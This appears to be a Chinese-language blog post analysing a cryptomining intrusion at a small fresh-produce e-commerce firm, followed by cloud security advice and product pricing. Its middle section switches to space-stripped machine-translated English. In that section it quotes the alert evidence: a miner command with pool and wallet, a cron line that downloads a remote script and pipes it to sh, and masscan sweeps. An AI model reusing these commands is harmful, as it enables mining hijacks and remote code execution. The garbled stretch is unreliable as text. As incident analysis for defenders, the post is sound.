0x00,前言继快递、外卖之后,网络买菜也成为一种时尚。这背后是高速发展的新零售生鲜行业,加上本地生活平台非常高频和重要的入口功能,吸引了众多互联网巨头。所以针对这个趋势,大公司都有自己完善的安全治理方案,一般不会发生重大安全事件。但对于一些中小公司来说,上线业务速度快(使用公有云),没有完善的前期业务安全方案,安全运营外包,核心业务和核心算法搭建外包,配合与大学。由于安全事件频发,本文以某生鲜电商安全事件为切入点,探讨快餐时代的安全运营方法。0x01,药引子@1,泛互联网业务介绍用户业务系统规模约40+台服务器,包括:核心业务系统:云闲集智能电商生态、客户关系管理系统;渠道端-营销端-数据端链上数字化运营系统:各类App渠道数据、第三方聊天记录数据导入系统、算法平台、自助BI数据报表、辅助系统:服务器运维监控、监管流程、安全服务等@2。安全问题发现阶段,从公有云平台侧发现安全问题。在公有云外网出口pop点的IDS监控数据中,发现该账号下多台主机受到外部DDoS攻击,导致部署在同一物理机上的其他云主机出现网络数据丢包。不幸的是,这次受影响的用户大多是游戏厂商,对网络延迟的要求特别高。在网络性能监控系统中发现延迟增加影响业务。@3。安全问题排查阶段在网络层面发现的安全问题需要在主机层面进行验证;主机层,需要安装主机安全客户端,否则无法感知主机层的安全威胁,大部分租户是通过后台查询找到的云主机没有安装,默认提供的镜像公共云,导致未安装云原生主机安全客户端。联系客户运维在所有服务器上安装主机安全客户端,同时购买企业版。安装完成后,主机安全入侵检测系统立刻发现海量的安全告警,告警类型包括:【1】挖矿检测:/tmp/watchdog--donate-level1-osg.minexmr.com:443-u44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT-k–tls[2]VirusTrojan:/tmp/watchdog[3]Sensitivefiletampering:00*/3**/bin/sh–cwget–q-0–http://195.xxx.xxx.118/foundundercrontabspr.sh|sh>/dev/null2>&1【4】Atthesametime,theassetfingerprintslogintothehostsecurityoperationinterface.Throughtheassetfingerprintfunction,itisfoundthatalargenumberofexternalscanningprocessesarerunningmasscan126.0.0.0/8-p2377--rate=50000masscan95.0.0.0/8-p4243--rate=50000masscan225.0.0.0/8-p4243--rate=50000masscan215.0.0.0/8-p2376--rate=50000Atthesametime,alargenumberofcontainerinterfacesarefoundtomonitorexternally,andthebusinessThesystemconstructionisrelativelyrandom,andmanysystemsarebuiltthroughdocker,directlymappingthedockerporttotheexternalnetwork.Theseincludesensitiveservicessuchasredisandmysql.【5】Containerruntimesecurityisdiscoveredthroughcontainerruntimesecurityproductfunctions:@4.Thehostthatfoundtheprobleminthebusinessstoplosshappenstobethecorebusinesssystemhostmentionedabove.Aftertheproblemoccurs,theplatformdirectlyofflineitsnetworkauthority,resultinginThefreshfoodbusinessordersystemcannotoperatenormally,andhasbeenchangedtomanualexcelbookkeeping.So,firstdoabusinessstoploss.Theoverallintrusionprocess:1.Bruteforcecrackingthecontainercomeswithmysqlandredis,2.Aftersuccessfullyobtainingthedatabasepermission,writeanddownloadthemaliciousprogramexecutionscript3.Executethemaliciousprogramscript4.Deploytheminingprograminthecontainer5.StartmasscanscanningProgramexternalhorizontalattack6.Invadethehostcomputeranddeployminingprogramsandscanningprograms.整体止损流程:清除crontab加载的恶意脚本,杀掉进程,删除可疑进程相关文件,将请求地址加入黑名单,申请开放网络权限。互联网企业其实并不愿意在安全上投入资金,运营代理提供的安全建议基本被认为是不重要的,等到安全事件影响到业务时才醒悟过来。经过多年的安全经验积累,建议云租户做到以下几点:1、充分利用公有云IaaS产品的原生安全属性VPC,不同业务单元需要隔离。安全组必须严格限制主机的对外端口。NATGateway,内部主机需要上线。NATGateway云主机使用复杂的密码。2、适当采购核心云原生安全产品。、程序运行认证、文件完整性验证、安全运行、网页防篡改等功能,帮助企业更便捷地管理主机安全风险,实时检测黑客行为,满足安全合规要求。成本:市场价1000元/台一年,40台约4万元。当然有折扣。云Web应用防火墙云Web应用防火墙(CloudWAF),云Web应用防火墙WAF对网站业务流量进行多维度检测和防护,结合深度机器学习,智能识别恶意请求特征,防御未知威胁,彻底防范网站免受黑客恶意攻击和入侵。费用:10个域名市场价4000元/年,48000元。当然有折扣。3、提高安全意识如果是代理操作,对给出的安全建议要给予足够的重视。如需转载,请注明原文地址。
